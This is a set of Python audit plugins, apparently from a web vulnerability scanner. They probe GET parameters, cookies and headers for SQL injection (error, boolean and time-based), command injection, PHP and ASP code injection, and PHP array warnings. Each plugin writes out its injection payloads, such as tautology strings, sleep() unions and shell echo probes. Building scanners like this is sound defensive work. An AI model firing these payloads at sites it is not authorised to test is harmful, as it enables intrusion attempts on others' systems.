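def audit(self):
    """Check each GET parameter for a PHP "array given" warning.

    One parameter at a time is renamed to ``name[]`` and the probe URL is
    requested; when the response contains both ``"Warning"`` and
    ``"array given"`` the probe URL is reported through ``out.success``.
    The original response is checked the same way first.  Requests with an
    empty query or a path extension outside ``acceptedExt`` are skipped, as
    are parameter names listed in ``ignoreParams``.
    """
    headers = self.requests.get_headers()  # request headers (dict)
    url = self.build_url()  # full request URL
    resp_str = self.response.get_body_str()  # response body decoded to str
    parsed = self.requests.urlparse
    params = self.requests.params
    netloc = self.requests.netloc

    if parsed.query == '':
        return
    if os.path.splitext(parsed.path)[1] not in acceptedExt:
        return

    # The unmodified response may already carry the warning.
    if "Warning" in resp_str and "array given" in resp_str:
        out.success(url, self.name)

    for key, value in params.items():
        if key.lower() in ignoreParams:
            continue
        data = copy.deepcopy(params)
        del data[key]
        data[key + "[]"] = value
        try:
            probe_url = prepare_url(netloc, params=data)
            r = requests.get(probe_url, headers=headers)
            if "Warning" in r.text and "array given" in r.text:
                out.success(probe_url, self.name)
        except Exception:
            # Best effort: one failed probe must not stop the remaining
            # parameters.  Narrowed from a bare ``except`` so that
            # KeyboardInterrupt/SystemExit still propagate.
            continue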
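def audit(self):
    """Numeric blind-injection check on GET query parameters.

    For every parameter whose value is a plain number (and whose name is not
    in ``ignoreParams``) two variants are requested: ``v+N`` and ``v+N-N``.
    A finding is reported when ``fuzzy_equal(resp_str, html1, 0.97)`` is
    false for the first variant while ``fuzzy_equal(resp_str, html2, 0.8)``
    is true for the second.  Probe URLs already recorded in ``Share`` are
    skipped.  Only GET requests with a non-empty query and an extension in
    ``acceptedExt`` are examined.
    """
    method = self.requests.command  # request method, GET or POST
    headers = self.requests.get_headers()  # request headers (dict)
    url = self.build_url()  # full request URL
    resp_str = self.response.get_body_str()  # response body decoded to str

    if method != 'GET':
        return

    # Raw string: ``\d`` in a plain literal is an invalid escape sequence.
    numeric = re.compile(r'^-?\d+(\.\d+)?$')

    # Only the request URL itself is scanned here.
    links = [url]
    for link in set(links):
        parsed = urlparse(link)
        if parsed.query == '':
            continue
        if os.path.splitext(parsed.path)[1] not in acceptedExt:
            continue

        # Split the raw query by hand; pairs without exactly one ``=`` are dropped.
        params = dict()
        for pair in parsed.query.split("&"):
            try:
                key, value = pair.split("=")
            except ValueError:
                continue
            params[key] = value
        base = "{}://{}{}".format(parsed.scheme, parsed.netloc, parsed.path)

        for key, value in params.items():
            if key.lower() in ignoreParams:
                continue
            if not numeric.search(value):
                continue
            data = copy.deepcopy(params)
            # Decision rule:
            #   1. ``v+N``   must NOT look like the original page
            #   2. ``v+N-N`` must look like the original page again
            payload1 = "{0}+{1}".format(value, random.randint(10, 100))
            data[key] = payload1
            url1 = prepare_url(base, params=data)
            if Share.in_url(url1):
                continue
            Share.add_url(url1)
            html1 = requests.get(url1, headers=headers).text
            if fuzzy_equal(resp_str, html1, 0.97):
                continue
            payload2 = "{0}+{1}-{1}".format(value, random.randint(10, 100))
            data[key] = payload2
            html2 = requests.get(base, params=data, headers=headers).text
            if fuzzy_equal(resp_str, html2, 0.8):
                msg = " {k}:{v} !== {k}:{v1} and {k}:{v} === {k}:{v2}".format(
                    k=key, v=value, v1=payload1, v2=payload2)
                out.success(link, self.name, payload=key, condition=msg)
                break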
def audit(self):
    """Boolean-based SQL injection check on GET query parameters.

    For each parameter and each template in ``sql_flag`` a "true" probe
    (both sides of the comparison equal) is requested; if its body is at
    least 0.88 similar to the original (``GetRatio``), a "false" probe with
    two different random strings follows.  A similarity below 0.78 for the
    false probe is reported through ``out.success`` with both raw responses.
    Only GET requests with a non-empty query and an extension in
    ``acceptedExt`` are examined; names in ``ignoreParams`` are skipped.
    """
    method = self.requests.command  # request method, GET or POST
    headers = self.requests.get_headers()  # request headers (dict)
    url = self.build_url()  # full request URL
    resp_data = self.response.get_body_data()  # response body (bytes), not used by this check
    resp_str = self.response.get_body_str()  # response body decoded to str
    resp_headers = self.response.get_headers()  # response headers (dict), not used by this check
    parsed = self.requests.urlparse
    params = self.requests.params
    netloc = self.requests.netloc

    if method != 'GET':
        return
    if parsed.query == '':
        return
    if os.path.splitext(parsed.path)[1] not in acceptedExt:
        return

    sql_flag = [
        "/**/and'{0}'='{1}'",
        "'and'{0}'='{1}",
        '"and"{0}"="{1}',
    ]

    for name, original in params.items():
        if name.lower() in ignoreParams:
            continue
        probe = copy.deepcopy(params)
        for template in sql_flag:
            # "true" page: identical random strings on both sides
            token = random_str(2)
            payload1 = original + template.format(token, token)
            probe[name] = payload1
            first = requests.get(prepare_url(netloc, params=probe), headers=headers)
            if GetRatio(resp_str, first.text) < 0.88:
                continue
            # "false" page: two different random strings
            payload2 = original + template.format(random_str(2), random_str(2))
            probe[name] = payload2
            second = requests.get(netloc, params=probe, headers=headers)
            if GetRatio(resp_str, second.text) < 0.78:
                msg = "{k}:{v} === {k}:{v1} and {k}:{v} !== {k}:{v2}".format(
                    k=name, v=original, v1=payload1, v2=payload2)
                out.success(url, self.name, payload=name, condition=msg,
                            raw=[first.raw, second.raw])
                break
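def audit(self):
    """Error-based SQL injection check on cookies and GET parameters.

    The marker ``sql_flag`` is appended to each cookie value (when a
    ``cookie`` header is present) and then to each GET parameter; every
    response is matched against the ``Get_sql_errors()`` patterns and a
    match is reported through ``out.success`` with the DBMS type.  Only GET
    requests with a non-empty query and an extension in ``acceptedExt``
    reach the parameter probes; names in ``ignoreParams`` are skipped.
    """
    method = self.requests.command  # request method, GET or POST
    headers = self.requests.get_headers()  # request headers (dict)
    url = self.build_url()  # full request URL
    parsed = self.requests.urlparse
    params = self.requests.params
    netloc = self.requests.netloc

    sql_flag = '鎈\'"\('

    # --- cookie values ---
    if headers and "cookie" in headers:
        cookies = paramToDict(headers["cookie"], place=PLACE.COOKIE)
        # Probe with a copy so the GET probes below still carry the
        # original cookie header.
        cookie_free_headers = copy.deepcopy(headers)
        del cookie_free_headers["cookie"]
        if cookies:
            for key, value in cookies.items():
                cookie = copy.deepcopy(cookies)
                cookie[key] = value + sql_flag
                # ``headers`` must be passed by keyword: the second positional
                # argument of requests.get() is ``params``.
                # NOTE(review): ``cookies=urlencode(cookie)`` hands a string
                # where requests expects a dict or CookieJar — confirm intent.
                r = requests.get(url, headers=cookie_free_headers,
                                 cookies=urlencode(cookie))
                for sql_regex, dbms_type in Get_sql_errors():
                    match = sql_regex.search(r.text)
                    if match:
                        out.success(url, self.name,
                                    payload="cookie: {}={}".format(key, cookie[key]),
                                    dbms_type=dbms_type, raw=r.raw)
                        break

    # --- GET parameters ---
    if method != 'GET':
        return
    if parsed.query == '':
        return
    if os.path.splitext(parsed.path)[1] not in acceptedExt:
        return

    for key, value in params.items():
        if key.lower() in ignoreParams:
            continue
        data = copy.deepcopy(params)
        data[key] = value + sql_flag
        url1 = prepare_url(netloc, params=data)
        r = requests.get(url1, headers=headers)
        html = r.text
        for sql_regex, dbms_type in Get_sql_errors():
            match = sql_regex.search(html)
            if match:
                out.success(url, self.name, payload="{}={}".format(key, data[key]),
                            dbms_type=dbms_type, raw=r.raw)
                break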
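def audit(self):
    """Time-based blind SQL injection check on GET query parameters.

    For each parameter and each template in ``sql_flag`` a probe with
    ``sleep(0)`` is timed, then one with ``sleep(2)``.  When the second
    request takes more than 1.5 s longer than the first, the parameter is
    reported through ``out.success`` with both timings.  Only GET requests
    with a non-empty query and an extension in ``acceptedExt`` are
    examined; names in ``ignoreParams`` are skipped.
    """
    method = self.requests.command  # request method, GET or POST
    headers = self.requests.get_headers()  # request headers (dict)
    url = self.build_url()  # full request URL
    parsed = self.requests.urlparse
    params = self.requests.params
    netloc = self.requests.netloc

    if method != 'GET':
        return
    if parsed.query == '':
        return
    if os.path.splitext(parsed.path)[1] not in acceptedExt:
        return

    sql_flag = [
        "'and(select+sleep({time})union/**/select+1)='",
        '"and(select+sleep({time})union/**/select+1)="',
        '/**/and(select+sleep({time})union/**/select+1)'
    ]

    for key, value in params.items():
        if key.lower() in ignoreParams:
            continue
        data = copy.deepcopy(params)
        for flag in sql_flag:
            # Baseline request with sleep(0).  perf_counter() is monotonic, so
            # a wall-clock adjustment mid-request cannot skew the comparison;
            # only the round trip is timed, the body is not read.
            payload1 = flag.format(time=0)
            data[key] = value + payload1
            url1 = prepare_url(netloc, params=data)
            started = time.perf_counter()
            requests.get(url1, headers=headers)
            elapsed = time.perf_counter() - started

            # Second request with sleep(2).
            payload2 = flag.format(time=2)
            data[key] = value + payload2
            started = time.perf_counter()
            requests.get(netloc, params=data, headers=headers)
            elapsed2 = time.perf_counter() - started

            if elapsed2 - elapsed > 1.5:
                msg = " {k}:{v1} 耗时 {time1}s; {k}:{v2} 耗时 {time2}s".format(
                    k=key, v1=payload1, v2=payload2, time1=elapsed, time2=elapsed2)
                out.success(url, self.name, payload=key, condition=msg)
                break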
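def audit(self):
    """Command injection check on GET query parameters.

    Each parameter is first replaced by, then suffixed (after ``;``) with,
    the probe commands in ``url_flag``; the response body is matched against
    the regexes listed for that probe and a hit is reported through
    ``out.success`` with the raw response.  Only GET requests with a
    non-empty query and an extension in ``acceptedExt`` are examined; names
    in ``ignoreParams`` are skipped.
    """
    method = self.requests.command  # request method, GET or POST
    headers = self.requests.get_headers()  # request headers (dict)
    url = self.build_url()  # full request URL
    parsed = self.requests.urlparse
    params = self.requests.params
    netloc = self.requests.netloc

    if method != 'GET':
        return
    if parsed.query == '':
        return
    if os.path.splitext(parsed.path)[1] not in acceptedExt:
        return

    # Raw strings: ``\s``/``\S`` in plain literals are invalid escapes, and
    # ``\x3d`` is read by the regex engine as ``=`` either way.
    url_flag = {
        "set|set&set": [
            r'Path=[\s\S]*?PWD=',
            r'Path=[\s\S]*?PATHEXT=',
            r'Path=[\s\S]*?SHELL=',
            r'Path\x3d[\s\S]*?PWD\x3d',
            r'Path\x3d[\s\S]*?PATHEXT\x3d',
            r'Path\x3d[\s\S]*?SHELL\x3d',
            r'SERVER_SIGNATURE=[\s\S]*?SERVER_SOFTWARE=',
            r'SERVER_SIGNATURE\x3d[\s\S]*?SERVER_SOFTWARE\x3d',
            r'Non-authoritative\sanswer:\s+Name:\s*',
            r'Server:\s*.*?\nAddress:\s*'
        ],
        # The marker is a fixed literal: the former ``.format(randint)`` on
        # this key had no placeholder, so the random value was never used.
        "echo `echo 6162983|base64`6162983": [
            "NjE2Mjk4Mwo=6162983"
        ]
    }

    for key, value in params.items():
        if key.lower() in ignoreParams:
            continue
        data = copy.deepcopy(params)
        for separator in ['', ';']:
            for flag, patterns in url_flag.items():
                # No separator: the parameter is replaced outright;
                # ``;``: the probe is appended to the original value.
                if separator == "":
                    data[key] = flag
                else:
                    data[key] = value + separator + flag
                url1 = prepare_url(netloc, params=data)
                r = requests.get(url1, headers=headers)
                html1 = r.text
                for rule in patterns:
                    if re.search(rule, html1, re.I | re.S | re.M):
                        out.success(url, self.name,
                                    payload="{}:{}".format(key, data[key]), raw=r.raw)
                        break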
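def audit(self):
    """PHP code injection check on GET query parameters.

    A random integer is hashed with the project ``md5`` helper; each
    parameter is then sent with every template in ``payloads`` (templates
    starting with ``p`` replace the value, the rest are appended to it).
    A response containing the expected hash, or matching the PHP
    ``Parse error`` pattern, is reported through ``out.success``.  Only GET
    requests with a non-empty query and an extension in ``acceptedExt`` are
    examined; names in ``ignoreParams`` are skipped.
    """
    method = self.requests.command  # request method, GET or POST
    headers = self.requests.get_headers()  # request headers (dict)
    url = self.build_url()  # full request URL
    parsed = self.requests.urlparse
    params = self.requests.params
    netloc = self.requests.netloc

    if method != 'GET':
        return
    if parsed.query == '':
        return
    if os.path.splitext(parsed.path)[1] not in acceptedExt:
        return

    # Raw string: ``\s`` in a plain literal is an invalid escape sequence.
    parse_error = r'Parse error: syntax error,.*?\sin\s'
    randint = random.randint(1, 256)
    verify_result = md5(str(randint).encode())
    payloads = [
        "print(md5({}));",
        ";print(md5({}));",
        "';print(md5({}));$a='",
        "\";print(md5({}));$a=\"",
        "${{@print(md5({}))}}",
        "${{@print(md5({}))}}\\"
    ]

    for key, value in params.items():
        if key.lower() in ignoreParams:
            continue
        data = copy.deepcopy(params)
        for payload in payloads:
            if payload[0] == "p":
                data[key] = payload.format(randint)
            else:
                data[key] = value + payload.format(randint)
            url1 = prepare_url(netloc, params=data)
            html1 = requests.get(url1, headers=headers).text
            # Either signal is a hit; both paths report the same finding.
            if verify_result in html1 or re.search(parse_error, html1, re.I | re.S | re.M):
                out.success(url, self.name, payload="{}:{}".format(key, data[key]))
                break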
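def audit(self):
    """Error-based SQL injection check on links found in the response.

    Links are collected from the page with ``get_links`` plus the request
    URL itself.  For each link with a non-empty query and an extension in
    ``acceptedExt``, the marker ``sql_flag`` is appended to one parameter at
    a time; the response is matched against ``Get_sql_errors()`` and a hit
    is reported through ``out.success``.  Probe URLs already recorded in
    ``Share`` are skipped.  Only GET requests are examined.
    """
    method = self.requests.command  # request method, GET or POST
    headers = self.requests.get_headers()  # request headers (dict)
    url = self.build_url()  # full request URL
    resp_str = self.response.get_body_str()  # response body decoded to str

    if method != 'GET':
        return

    # Hoisted out of the link loop: the marker never changes.  (The former
    # unused ``get_body_data().decode()`` was dropped — it could raise
    # UnicodeDecodeError on a non-UTF-8 body and abort the whole audit.)
    sql_flag = '鎈\'"\('

    links = get_links(resp_str, url, True)
    links.append(url)
    for link in set(links):
        parsed = urlparse(link)
        if parsed.query == '':
            continue
        if os.path.splitext(parsed.path)[1] not in acceptedExt:
            continue

        # Split the raw query by hand; pairs without exactly one ``=`` are dropped.
        params = dict()
        for pair in parsed.query.split("&"):
            try:
                key, value = pair.split("=")
            except ValueError:
                continue
            params[key] = value
        base = "{}://{}{}".format(parsed.scheme, parsed.netloc, parsed.path)

        for key, value in params.items():
            if key.lower() in ignoreParams:
                continue
            data = copy.deepcopy(params)
            data[key] = value + sql_flag
            url1 = prepare_url(base, params=data)
            if Share.in_url(url1):
                continue
            Share.add_url(url1)
            html = requests.get(url1, headers=headers).text
            for sql_regex, dbms_type in Get_sql_errors():
                match = sql_regex.search(html)
                if match:
                    out.success(link, self.name, payload="{}={}".format(key, data[key]))
                    break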
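def audit(self):
    """ASP code injection check on GET query parameters.

    Two random integers are multiplied and the product is looked for in the
    response after each parameter is sent with the ``response.write``
    templates in ``payloads``.  A hit is reported through ``out.success``
    with the raw response.  Only GET requests with a non-empty query and an
    extension in ``acceptedExt`` are examined; names in ``ignoreParams``
    are skipped.
    """
    method = self.requests.command  # request method, GET or POST
    headers = self.requests.get_headers()  # request headers (dict)
    url = self.build_url()  # full request URL
    parsed = self.requests.urlparse
    params = self.requests.params
    netloc = self.requests.netloc

    if method != 'GET':
        return
    if parsed.query == '':
        return
    if os.path.splitext(parsed.path)[1] not in acceptedExt:
        return

    randint1 = random.randint(10000, 90000)
    randint2 = random.randint(10000, 90000)
    expected = str(randint1 * randint2)
    payloads = [
        'response.write({}*{})'.format(randint1, randint2),
        '\'+response.write({}*{})+\''.format(randint1, randint2),
        '"response.write({}*{})+"'.format(randint1, randint2),
    ]

    for key, value in params.items():
        if key.lower() in ignoreParams:
            continue
        data = copy.deepcopy(params)
        for payload in payloads:
            # The bare ``response.write`` template replaces the value; the
            # quoted templates are appended to it.  The former test
            # ``payload[0] == ""`` could never be true for a one-character
            # slice, so every template was appended.
            if payload.startswith("response"):
                data[key] = payload
            else:
                data[key] = value + payload
            url1 = prepare_url(netloc, params=data)
            r = requests.get(url1, headers=headers)
            if expected in r.text:
                out.success(url, self.name, payload="{}:{}".format(key, data[key]),
                            raw=r.raw)
                break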
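def audit(self):
    """Numeric blind-injection check on GET query parameters.

    For every parameter whose value is a plain number (and whose name is not
    in ``ignoreParams``) two variants are requested: ``v+N`` and ``v+N-N``.
    A finding is reported when ``fuzzy_equal(resp_str, html1, 0.87)`` is
    false for the first variant while ``fuzzy_equal(resp_str, html2, 0.8)``
    is true for the second.  Only GET requests with a non-empty query and an
    extension in ``acceptedExt`` are examined.
    """
    method = self.requests.command  # request method, GET or POST
    headers = self.requests.get_headers()  # request headers (dict)
    url = self.build_url()  # full request URL
    resp_str = self.response.get_body_str()  # response body decoded to str
    parsed = self.requests.urlparse
    params = self.requests.params
    netloc = self.requests.netloc

    if method != 'GET':
        return
    if parsed.query == '':
        return
    if os.path.splitext(parsed.path)[1] not in acceptedExt:
        return

    # Raw string: ``\d`` in a plain literal is an invalid escape sequence.
    numeric = re.compile(r'^-?\d+(\.\d+)?$')

    for key, value in params.items():
        if key.lower() in ignoreParams:
            continue
        if not numeric.search(value):
            continue
        data = copy.deepcopy(params)
        # Decision rule:
        #   1. ``v+N``   must NOT look like the original page
        #   2. ``v+N-N`` must look like the original page again
        payload1 = "{0}+{1}".format(value, random.randint(10, 100))
        data[key] = payload1
        url1 = prepare_url(netloc, params=data)
        html1 = requests.get(url1, headers=headers).text
        if fuzzy_equal(resp_str, html1, 0.87):
            continue
        payload2 = "{0}+{1}-{1}".format(value, random.randint(10, 100))
        data[key] = payload2
        html2 = requests.get(netloc, params=data, headers=headers).text
        if fuzzy_equal(resp_str, html2, 0.8):
            msg = " {k}:{v} !== {k}:{v1} and {k}:{v} === {k}:{v2}".format(
                k=key, v=value, v1=payload1, v2=payload2)
            out.success(url, self.name, payload=key, condition=msg)
            break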
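def audit(self):
    """Check each query parameter for a PHP "array given" warning.

    Only paths with no extension or a ``.php`` extension are examined.  The
    original response is checked first; then each parameter is renamed to
    ``name[]`` in turn and the probe URL requested.  A response containing
    both ``"Warning"`` and ``"array given"`` is reported through
    ``out.success``.  Probe URLs already recorded in ``Share`` are skipped,
    as are parameter names listed in ``ignoreParams``.
    """
    headers = self.requests.get_headers()  # request headers (dict)
    url = self.build_url()  # full request URL
    resp_str = self.response.get_body_str()  # response body decoded to str

    parsed = urlparse(url)
    # Accept extension-less paths and ``.php`` ones only.
    basepath = os.path.basename(parsed.path)
    if "." in basepath and ".php" not in basepath:
        return

    # The unmodified response may already carry the warning.
    if "Warning" in resp_str and "array given" in resp_str:
        out.success(url, self.name)

    # Split the raw query by hand; pairs without exactly one ``=`` are dropped.
    params = dict()
    for pair in parsed.query.split("&"):
        try:
            key, value = pair.split("=")
        except ValueError:
            continue
        params[key] = value
    base = "{}://{}{}".format(parsed.scheme, parsed.netloc, parsed.path)

    for key, value in params.items():
        if key.lower() in ignoreParams:
            continue
        data = copy.deepcopy(params)
        del data[key]
        data[key + "[]"] = value
        try:
            probe_url = prepare_url(base, params=data)
            if Share.in_url(probe_url):
                continue
            Share.add_url(probe_url)
            r = requests.get(probe_url, headers=headers)
            if "Warning" in r.text and "array given" in r.text:
                out.success(probe_url, self.name)
        except Exception:
            # Best effort: one failed probe must not stop the remaining
            # parameters.  Narrowed from a bare ``except`` so that
            # KeyboardInterrupt/SystemExit still propagate.
            continue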
def audit(self):
    """Error-based SQL injection check on GET query parameters.

    Appends the ``sql_flag`` marker to one parameter at a time, requests the
    probe URL and matches the body against ``Get_sql_errors()``; the first
    matching pattern is reported through ``out.success`` and the next
    parameter is tried.  Only GET requests with a non-empty query and an
    extension in ``acceptedExt`` are examined; names in ``ignoreParams``
    are skipped.
    """
    method = self.requests.command  # request method, GET or POST
    headers = self.requests.get_headers()  # request headers (dict)
    url = self.build_url()  # full request URL
    resp_data = self.response.get_body_data()  # response body (bytes), not used by this check
    resp_str = self.response.get_body_str()  # response body decoded to str, not used by this check
    resp_headers = self.response.get_headers()  # response headers (dict), not used by this check
    parsed = self.requests.urlparse
    params = self.requests.params
    netloc = self.requests.netloc

    if method != 'GET':
        return
    if parsed.query == '':
        return
    if os.path.splitext(parsed.path)[1] not in acceptedExt:
        return

    sql_flag = '鎈\'"\('

    for name, original in params.items():
        if name.lower() in ignoreParams:
            continue
        probe = copy.deepcopy(params)
        probe[name] = original + sql_flag
        body = requests.get(prepare_url(netloc, params=probe), headers=headers).text
        for sql_regex, dbms_type in Get_sql_errors():
            if sql_regex.search(body) is not None:
                out.success(url, self.name, payload="{}={}".format(name, probe[name]))
                break
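def audit(self):
    """Boolean-based SQL injection check on the request URL's parameters.

    For each parameter and each template in ``sql_flag`` a "true" probe
    (identical random strings) is requested; if ``GetRatio`` against the
    original body is at least 0.88, a "false" probe with two different
    random strings follows, and a ratio below 0.68 is reported through
    ``out.success``.  Probe URLs already recorded in ``Share`` are skipped.
    Only GET requests with a non-empty query and an extension in
    ``acceptedExt`` are examined; names in ``ignoreParams`` are skipped.
    """
    method = self.requests.command  # request method, GET or POST
    headers = self.requests.get_headers()  # request headers (dict)
    url = self.build_url()  # full request URL
    resp_str = self.response.get_body_str()  # response body decoded to str

    if method != 'GET':
        return

    # Hoisted out of the link loop: the templates never change.  (The former
    # unused ``get_body_data().decode()`` was dropped — it could raise
    # UnicodeDecodeError on a non-UTF-8 body and abort the whole audit.)
    sql_flag = [
        "'and'{0}'='{1}",
        '"and"{0}"="{1}'
    ]

    # Only the request URL itself is scanned here.
    links = [url]
    for link in set(links):
        parsed = urlparse(link)
        if parsed.query == '':
            continue
        if os.path.splitext(parsed.path)[1] not in acceptedExt:
            continue

        # Split the raw query by hand; pairs without exactly one ``=`` are dropped.
        params = dict()
        for pair in parsed.query.split("&"):
            try:
                key, value = pair.split("=")
            except ValueError:
                continue
            params[key] = value
        base = "{}://{}{}".format(parsed.scheme, parsed.netloc, parsed.path)

        for key, value in params.items():
            if key.lower() in ignoreParams:
                continue
            data = copy.deepcopy(params)
            for flag in sql_flag:
                # "true" page: identical random strings on both sides
                rand_str = random_str(2)
                payload1 = flag.format(rand_str, rand_str)
                data[key] = value + payload1
                url1 = prepare_url(base, params=data)
                if Share.in_url(url1):
                    continue
                Share.add_url(url1)
                html1 = requests.get(url1, headers=headers).text
                if GetRatio(resp_str, html1) < 0.88:  # threshold picked by hand
                    continue
                # "false" page: two different random strings
                payload2 = flag.format(random_str(2), random_str(2))
                data[key] = value + payload2
                html2 = requests.get(base, params=data, headers=headers).text
                if GetRatio(resp_str, html2) < 0.68:  # threshold picked by hand
                    msg = " {k}:{v} !== {k}:{v1} and {k}:{v} === {k}:{v2}".format(
                        k=key, v=value, v1=payload1, v2=payload2)
                    out.success(link, self.name, payload=key, condition=msg)
                    break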
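def audit(self):
    """Error-based SQL injection check on cookies, GET parameters and headers.

    The marker ``sql_flag`` is appended in turn to every cookie value, every
    GET parameter and a small set of request headers; each response is
    matched against the ``Get_sql_errors()`` patterns and a match is
    reported through ``out.success`` with the DBMS type (and, for the
    parameter and header probes, the matched error text).  In the cookie
    and header probes a response whose length equals the original is
    skipped.  Only paths with an extension in ``acceptedExt`` are examined;
    parameter names in ``ignoreParams`` are skipped.
    """
    method = self.requests.command  # request method, GET or POST
    headers = self.requests.get_headers()  # request headers (dict)
    url = self.build_url()  # full request URL
    resp_str = self.response.get_body_str()  # response body decoded to str
    parsed = self.requests.urlparse
    params = self.requests.params
    netloc = self.requests.netloc

    # Checked once here; the GET branch below no longer repeats it.
    if os.path.splitext(parsed.path)[1] not in acceptedExt:
        return
    origin_len = len(resp_str)
    sql_flag = '鎈\'"\('

    # --- cookie values ---
    if headers and "cookie" in headers:
        cookies = paramToDict(headers["cookie"], place=PLACE.COOKIE)
        # Probe with a copy so the GET probes below still carry the
        # original cookie header.
        tmp_headers = copy.deepcopy(headers)
        del tmp_headers["cookie"]
        if cookies:
            for key, value in cookies.items():
                cookie = copy.deepcopy(cookies)
                cookie[key] = value + sql_flag
                # NOTE(review): ``cookies=urlencode(cookie)`` hands a string
                # where requests expects a dict or CookieJar — confirm intent.
                r = requests.get(url, headers=tmp_headers, cookies=urlencode(cookie))
                if origin_len == len(r.text):
                    continue
                for sql_regex, dbms_type in Get_sql_errors():
                    match = sql_regex.search(r.text)
                    if match:
                        out.success(url, self.name,
                                    payload="cookie: {}={}".format(key, cookie[key]),
                                    dbms_type=dbms_type, raw=r.raw)
                        break

    # --- GET parameters ---
    if method == 'GET':
        # NOTE(review): returning here also skips the header probe below for
        # GET requests without a query string — confirm that is intended.
        if parsed.query == '':
            return
        for key, value in params.items():
            if key.lower() in ignoreParams:
                continue
            data = copy.deepcopy(params)
            data[key] = value + sql_flag
            url1 = prepare_url(netloc, params=data)
            r = requests.get(url1, headers=headers)
            html = r.text
            for sql_regex, dbms_type in Get_sql_errors():
                match = sql_regex.search(html)
                if match:
                    out.success(url, self.name, payload="{}={}".format(key, data[key]),
                                dbms_type=dbms_type, raw=r.raw, errinfo=match.group())
                    break

    # --- request headers ---
    if headers:
        header_flag = '\'"\('
        new_headers = {
            "User-Agent": headers.get("User-Agent", "") + header_flag,
            "referer": headers.get("referer", url) + header_flag,
            "x-forwarded-for": headers.get("x-forwarded-for", "127.0.0.1") + header_flag,
            "via": headers.get("via", "") + header_flag
        }
        r = requests.get(url, headers=new_headers)
        html = r.text
        if origin_len == len(html):
            return
        for sql_regex, dbms_type in Get_sql_errors():
            match = sql_regex.search(html)
            if match:
                out.success(url, self.name, type="header inject",
                            dbms_type=dbms_type, raw=r.raw, errinfo=match.group())
                break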